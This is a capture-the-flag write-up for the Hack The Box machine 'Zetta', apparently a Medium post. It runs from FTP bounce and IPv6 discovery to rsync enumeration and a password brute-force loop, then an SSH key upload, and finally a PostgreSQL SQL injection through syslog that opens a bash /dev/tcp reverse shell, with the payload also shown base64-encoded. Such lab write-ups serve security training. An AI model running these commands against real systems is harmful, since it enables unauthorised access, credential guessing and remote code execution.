[HTB] Zetta — Write-up

Recon

Nmap

### Initial Nmap
nmap -Pn --open -sC -sV -p- -T4 10.10.10.156

Web Server (HTTP — 80/TCP)

Initial Foothold

FTP Login

FXP — FTP Bounce Attack

### Nmap FTP Bounce Attack
nmap -Pn -p- -T5 --open -v -b AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@10.10.10.156 127.0.0.1

RFC2428 — FTP Extensions for IPv6 and NATs

### EPRT Command
quote EPRT |1|10.10.10.156|2222|
quote EPRT |2|dead:beef:2::102e|2222| # My Kali IPv6 Address
quote LIST
### Tcpdump
tcpdump -i tun0 -vvv ip6
FTP Service
Tcpdump

Nmap 2

### Nmap IPv6
nmap -Pn --open -p- -sC -sV -6 dead:beef::250:56ff:feb9:495f

Rsync

### Rsync List Module
nmap -Pn --open -p 8730 -6 --script=rsync-list-modules -sC -sV dead:beef::250:56ff:feb9:495f
### Rsync Module Access
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:495f]:8730/bin
### Rsync Module Access
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:495f]:8730/etc
### Rsync Module Copy
rsync -av rsync://[dead:beef::250:56ff:feb9:495f]:8730/etc /root/Documents/htb/box/zetta/rsync/etc
### /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
roy:x:1000:1000:roy,,,:/home/roy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/sbin/nologin
postgres:x:106:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
### Rsync "home_roy" Module Access
rsync -av rsync://roy@[dead:beef::250:56ff:feb9:495f]:8730/home_roy

Rsync — Password Brute-force

### Rsync Password Brute-force
cat rockyou.txt | while read i; do export RSYNC_PASSWORD=$i;
rsync -q rsync://roy@[dead:beef::250:56ff:feb9:495f]:8730/home_roy 2>/dev/null;
if [[ $? -eq 0 ]];
then echo "[+] Pass: $i" && break;
fi;
done

User Shell #1 (Roy)

Rsync — SSH Key Upload

rsync -aR .ssh/ rsync://roy@[dead:beef::250:56ff:feb9:495f]:8730/home_roy/

User Shell #2 (Postgres)

roy@zetta:~$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Roy’s Home Dir

.tudu.xml — rsync

.tudu.xml — PostgresSQL

### Fetching Git Log
git log -p

PostgreSQL SQL Injection Attack

SQLi Vulnerability Check

### Monitoring PostgresSQL Log
roy@zetta:/var/log/postgresql$ tail -f postgresql-11-main.log
### Logger Query
logger -p local7.info "bigb0ss" # No error - Without single-quotes
logger -p local7.info "bigb0ss'" # Yes error - With single-quotes
No SQL Error
Yes SQL Error

SQLi Attack to RCE

### SQLi Attempt #1
logger -p local7.info "bigb0ss',null);
DROP TABLE IF EXISTS test;
CREATE TABLE test(cmd_output text);
COPY test FROM PROGRAM 'ping -c 1 10.10.14.48';
SELECT * FROM test;
DROP TABLE IF EXISTS test;-- -"
### SQLi Attempt #2
logger -p local7.info "bigb0ss',null);
DROP TABLE IF EXISTS test;
CREATE TABLE test(cmd_output text);
COPY test FROM PROGRAM \$$ ping -c 1 10.10.14.48 \$$;
SELECT * FROM test;
DROP TABLE IF EXISTS test;-- -"

SQLi Attack to Reverse Shell

### Reverse Shell
bash -i >& /dev/tcp/10.10.14.48/443 0>&1
### Base64 Encode (Avoid potential syntax error on the payload)
echo -n "bash -i >& /dev/tcp/10.10.14.48/443 0>&1" | base64
### SQLi Attack
logger -p local7.info "bigb0ss',null); DROP TABLE IF EXISTS test; CREATE TABLE test(cmd_output text); COPY test FROM PROGRAM \$$ echo \"echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OC80NDMgMD4mMQ== | base64 -d | bash\" | bash \$$;-- -"

SSH — Postgres

Root Shell

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store